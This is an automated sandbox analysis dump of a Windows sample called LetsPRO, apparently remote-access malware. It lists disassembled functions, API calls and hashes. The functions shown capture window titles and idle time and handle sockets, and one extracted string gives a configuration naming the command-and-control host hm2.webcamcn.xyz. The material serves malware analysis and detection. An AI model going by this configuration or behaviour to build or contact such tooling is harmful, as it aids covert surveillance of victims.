                                          • Part of subcall function 025F2C50: InterlockedExchange.KERNEL32(00000018,00000000), ref: 025F2CC8
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025F6347
                                        • CloseHandle.KERNEL32(?), ref: 025F6365
                                        • CloseHandle.KERNEL32(?), ref: 025F6372
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseCreateEventHandleSleep$ExchangeInterlockedObjectSingleStartupWait__fassign_malloc
                                        • String ID: 127.0.0.1
                                        • API String ID: 3083163006-3619153832
                                        • Opcode ID: 7bb8d5981c97c5beb9d1da5caad4220c2c963d59c2fa20f8e055759ef3c351f8
                                        • Instruction ID: 7519875bcd92d78881b7a6af908fd9c194c8f7904af3d131f44b139b1249eac1
                                        • Opcode Fuzzy Hash: 7bb8d5981c97c5beb9d1da5caad4220c2c963d59c2fa20f8e055759ef3c351f8
                                        • Instruction Fuzzy Hash: 9551F9B0E81246AFEB40EFA4DCC1D5FBB75BF48304F045619E212A72C4CB705554EB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        • _memset.LIBCMT ref: 03F3BB21
                                        • GetLastInputInfo.USER32(?), ref: 03F3BB37
                                        • GetTickCount.KERNEL32 ref: 03F3BB3D
                                        • wsprintfW.USER32 ref: 03F3BB66
                                        • GetForegroundWindow.USER32 ref: 03F3BB6F
                                        • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 03F3BB83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                        • String ID: %d min
                                        • API String ID: 3754759880-1947832151
                                        • Opcode ID: 0bbbc3f547a19564f366ebf222fdafdf892e44d914239a05d21c6b2ca435d974
                                        • Instruction ID: d880506ae1bad01d856896beef8294dcf9cac553b325fae54b576bdeffef935b
                                        • Opcode Fuzzy Hash: 0bbbc3f547a19564f366ebf222fdafdf892e44d914239a05d21c6b2ca435d974
                                        • Instruction Fuzzy Hash: 4D41A0B5D00218AFCB10EFA4DC99E9FBBB8EF45700F088565E9099B345DA749A04CBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT ref: 03F36DD9
                                        • RegOpenKeyExW.KERNEL32(80000001,03F55164,00000000,00020019,75A773E0), ref: 03F36DFC
                                        • RegQueryValueExW.KERNEL32(75A773E0,GROUP,00000000,00000001,?,00000208), ref: 03F36E4A
                                        • lstrcmpW.KERNEL32(?,03F55148), ref: 03F36E60
                                        • lstrcpyW.KERNEL32(03F356EA,?), ref: 03F36E72
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                        • String ID: GROUP
                                        • API String ID: 2102619503-2593425013
                                        • Opcode ID: b3f5ce213ee71b30c8a75c1f5edc519f5effc0662ff2ac9f6f7bd6d46556b5b3
                                        • Instruction ID: 3a6ab19321c3cfc31fb4a633144a97fa991a63ff6f50d9e7e2fa9e920903d46d
                                        • Opcode Fuzzy Hash: b3f5ce213ee71b30c8a75c1f5edc519f5effc0662ff2ac9f6f7bd6d46556b5b3
                                        • Instruction Fuzzy Hash: 84317471901319BBDB20DF90DD89B9EB7B8FB09710F104699E519E7280DB78AA84CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 025F7320
                                        • __calloc_crt.LIBCMT ref: 025F732C
                                        • __getptd.LIBCMT ref: 025F7339
                                        • CreateThread.KERNEL32(?,?,025F7296,00000000,?,?), ref: 025F7370
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 025F737A
                                        • _free.LIBCMT ref: 025F7383
                                        • __dosmaperr.LIBCMT ref: 025F738E
                                          • Part of subcall function 025F71ED: __getptd_noexit.LIBCMT ref: 025F71ED
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                        • String ID:
                                        • API String ID: 155776804-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 03F3FA4E
                                        • __calloc_crt.LIBCMT ref: 03F3FA5A
                                        • __getptd.LIBCMT ref: 03F3FA67
                                        • CreateThread.KERNEL32(?,?,03F3F9C4,00000000,?,?), ref: 03F3FA9E
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 03F3FAA8
                                        • _free.LIBCMT ref: 03F3FAB1
                                        • __dosmaperr.LIBCMT ref: 03F3FABC
                                          • Part of subcall function 03F3F91B: __getptd_noexit.LIBCMT ref: 03F3F91B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                        • String ID:
                                        • API String ID: 155776804-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03F37523), ref: 03F3743D
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F37444
                                        • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03F37523), ref: 03F37452
                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03F37523), ref: 03F3745A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: InfoSystem$AddressHandleModuleNativeProc
                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                        • API String ID: 3433367815-192647395
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 025F729C
                                          • Part of subcall function 025F97C0: TlsGetValue.KERNEL32(00000000,025F9919,?,025FA030,00000000,00000001,00000000,?,025FC1C3,00000018,02607BF0,0000000C,025FC253,00000000,00000000), ref: 025F97C9
                                          • Part of subcall function 025F97C0: RtlDecodePointer.NTDLL ref: 025F97DB
                                          • Part of subcall function 025F97C0: TlsSetValue.KERNEL32(00000000,?,025FA030,00000000,00000001,00000000,?,025FC1C3,00000018,02607BF0,0000000C,025FC253,00000000,00000000,?,025F9A26), ref: 025F97EA
                                        • ___fls_getvalue@4.LIBCMT ref: 025F72A7
                                          • Part of subcall function 025F97A0: TlsGetValue.KERNEL32(?,?,025F72AC,00000000), ref: 025F97AE
                                        • ___fls_setvalue@8.LIBCMT ref: 025F72BA
                                          • Part of subcall function 025F97F4: RtlDecodePointer.NTDLL(?), ref: 025F9805
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 025F72C3
                                        • RtlExitUserThread.NTDLL(00000000), ref: 025F72CA
                                        • GetCurrentThreadId.KERNEL32 ref: 025F72D0
                                        • __freefls@4.LIBCMT ref: 025F72F0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$DecodePointerThread$CurrentErrorExitLastUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                        • String ID:
                                        • API String ID: 2876972746-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 03F3F9CA
                                          • Part of subcall function 03F43CA0: TlsGetValue.KERNEL32(00000000,03F43DF9,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000), ref: 03F43CA9
                                          • Part of subcall function 03F43CA0: DecodePointer.KERNEL32(?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06,0000000D), ref: 03F43CBB
                                          • Part of subcall function 03F43CA0: TlsSetValue.KERNEL32(00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06), ref: 03F43CCA
                                        • ___fls_getvalue@4.LIBCMT ref: 03F3F9D5
                                          • Part of subcall function 03F43C80: TlsGetValue.KERNEL32(?,?,03F3F9DA,00000000), ref: 03F43C8E
                                        • ___fls_setvalue@8.LIBCMT ref: 03F3F9E8
                                          • Part of subcall function 03F43CD4: DecodePointer.KERNEL32(?,?,?,03F3F9ED,00000000,?,00000000), ref: 03F43CE5
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 03F3F9F1
                                        • ExitThread.KERNEL32 ref: 03F3F9F8
                                        • GetCurrentThreadId.KERNEL32 ref: 03F3F9FE
                                        • __freefls@4.LIBCMT ref: 03F3FA1E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                        • String ID:
                                        • API String ID: 2383549826-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025F32E1
                                        • Sleep.KERNEL32(00000258), ref: 025F32EE
                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 025F32F6
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025F3302
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025F330A
                                        • Sleep.KERNEL32(0000012C), ref: 025F331B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                        • String ID:
                                        • API String ID: 3137405945-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 03F3669B
                                        • CoCreateInstance.OLE32(03F546FC,00000000,00000001,03F5471C,?,?,?,?,?,?,?,?,?,?,03F3588A), ref: 03F366B2
                                        • SysFreeString.OLEAUT32(?), ref: 03F3674C
                                        • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,03F3588A), ref: 03F3677D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateFreeInitializeInstanceStringUninitialize
                                        • String ID: FriendlyName
                                        • API String ID: 841178590-3623505368
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _malloc.LIBCMT ref: 025F7011
                                          • Part of subcall function 025F6F63: __FF_MSGBANNER.LIBCMT ref: 025F6F7C
                                          • Part of subcall function 025F6F63: __NMSG_WRITE.LIBCMT ref: 025F6F83
                                          • Part of subcall function 025F6F63: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 025F6FA8
                                        • std::exception::exception.LIBCMT ref: 025F7046
                                        • std::exception::exception.LIBCMT ref: 025F7060
                                        • __CxxThrowException@8.LIBCMT ref: 025F7071
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                        • String ID: bad allocation
                                        • API String ID: 615853336-2104205924
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _malloc.LIBCMT ref: 03F3F721
                                          • Part of subcall function 03F3F673: __FF_MSGBANNER.LIBCMT ref: 03F3F68C
                                          • Part of subcall function 03F3F673: __NMSG_WRITE.LIBCMT ref: 03F3F693
                                          • Part of subcall function 03F3F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76), ref: 03F3F6B8
                                        • std::exception::exception.LIBCMT ref: 03F3F756
                                        • std::exception::exception.LIBCMT ref: 03F3F770
                                        • __CxxThrowException@8.LIBCMT ref: 03F3F781
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                        • String ID: bad allocation
                                        • API String ID: 615853336-2104205924
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 025F2D2C
                                        • CancelIo.KERNEL32(?), ref: 025F2D36
                                        • InterlockedExchange.KERNEL32(00000000,00000000), ref: 025F2D3F
                                        • closesocket.WS2_32(?), ref: 025F2D49
                                        • SetEvent.KERNEL32(00000001), ref: 025F2D53
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                        • String ID:
                                        • API String ID: 1486965892-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03F32D5C
                                        • CancelIo.KERNEL32(?), ref: 03F32D66
                                        • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03F32D6F
                                        • closesocket.WS2_32(?), ref: 03F32D79
                                        • SetEvent.KERNEL32(00000001), ref: 03F32D83
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                        • String ID:
                                        • API String ID: 1486965892-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • lstrlenW.KERNEL32(|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:,?,025F7869,?,?,?,?,?,?,02607B00,0000000C,025F7911,?), ref: 025F6396
                                          • Part of subcall function 025F5E30: _memset.LIBCMT ref: 025F5E61
                                        • CreateThread.KERNEL32(00000000,00000000,025F6110,00000000,00000000,00000000), ref: 025F63BE
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,025F7869,?,?,?,?,?,?,02607B00,0000000C,025F7911,?), ref: 025F63CC
                                        Strings
                                        • |p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:, xrefs: 025F6391
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateObjectSingleThreadWait_memsetlstrlen
                                        • String ID: |p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:
                                        • API String ID: 2656291350-929315725
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000020,00000000,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401EA5
                                        • GetFileSize.KERNEL32(00000000,00000001,?,00000268,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401EBC
                                          • Part of subcall function 00401D70: GetProcessHeap.KERNEL32(00401ECD,00000008,?,00000268,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401D79
                                          • Part of subcall function 00401D70: RtlAllocateHeap.NTDLL(?,00000000,80000004,?,00401ECD,00000008,?,00000268,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401D8D
                                          • Part of subcall function 00401D70: MessageBoxA.USER32(00000000,004034C4,00403454,00000010), ref: 00401DA6
                                        • ReadFile.KERNEL32(00000000,00000008,00000000,?,00000000,80000004,?,00401B47), ref: 00401EE8
                                        • FindCloseChangeNotification.KERNEL32(00000000,?,00401B47), ref: 00401EEF
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: File$Heap$AllocateChangeCloseCreateFindMessageNotificationProcessReadSize
                                        • String ID:
                                        • API String ID: 4143106703-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 025F313B
                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 025F3153
                                        • GetCurrentThreadId.KERNEL32 ref: 025F31FF
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentThread$ExchangeInterlocked
                                        • String ID:
                                        • API String ID: 4033114805-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 03F3316B
                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 03F33183
                                        • GetCurrentThreadId.KERNEL32 ref: 03F3322F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentThread$ExchangeInterlocked
                                        • String ID:
                                        • API String ID: 4033114805-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __floor_pentium4.LIBCMT ref: 025F11E9
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 025F1226
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 025F1255
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Virtual$AllocFree__floor_pentium4
                                        • String ID:
                                        • API String ID: 2605973128-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __floor_pentium4.LIBCMT ref: 03F311E9
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03F31226
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03F31255
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Virtual$AllocFree__floor_pentium4
                                        • String ID:
                                        • API String ID: 2605973128-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __floor_pentium4.LIBCMT ref: 025F112F
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 025F115F
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 025F1192
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Virtual$AllocFree__floor_pentium4
                                        • String ID:
                                        • API String ID: 2605973128-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __floor_pentium4.LIBCMT ref: 03F3112F
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03F3115F
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03F31192
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Virtual$AllocFree__floor_pentium4
                                        • String ID:
                                        • API String ID: 2605973128-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03F39E04
                                        • GdipDisposeImage.GDIPLUS(?), ref: 03F39E18
                                        • GdipDisposeImage.GDIPLUS(?), ref: 03F39E3B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 800915452-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • EnterCriticalSection.KERNEL32(03F5FB64), ref: 03F39ADC
                                        • GdiplusStartup.GDIPLUS(03F5FB60,?,?), ref: 03F39B15
                                        • LeaveCriticalSection.KERNEL32(03F5FB64), ref: 03F39B26
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                        • String ID:
                                        • API String ID: 389129658-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetProcessHeap.KERNEL32(00401ECD,00000008,?,00000268,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401D79
                                        • RtlAllocateHeap.NTDLL(?,00000000,80000004,?,00401ECD,00000008,?,00000268,?,00401034,00000001,00403200,00000000,80000004,?,00401B47), ref: 00401D8D
                                        • MessageBoxA.USER32(00000000,004034C4,00403454,00000010), ref: 00401DA6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Heap$AllocateMessageProcess
                                        • String ID:
                                        • API String ID: 2992861138-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __getptd.LIBCMT ref: 025F7261
                                          • Part of subcall function 025F997B: __getptd_noexit.LIBCMT ref: 025F997E
                                          • Part of subcall function 025F997B: __amsg_exit.LIBCMT ref: 025F998B
                                        • __endthreadex.LIBCMT ref: 025F7271
                                          • Part of subcall function 025F7236: __getptd_noexit.LIBCMT ref: 025F723B
                                          • Part of subcall function 025F7236: __freeptd.LIBCMT ref: 025F7245
                                          • Part of subcall function 025F7236: RtlExitUserThread.NTDLL(?,?,025F7276,00000000), ref: 025F724E
                                          • Part of subcall function 025F7236: __XcptFilter.LIBCMT ref: 025F7282
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
                                        • String ID:
                                        • API String ID: 4175385852-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __getptd_noexit.LIBCMT ref: 03F3F969
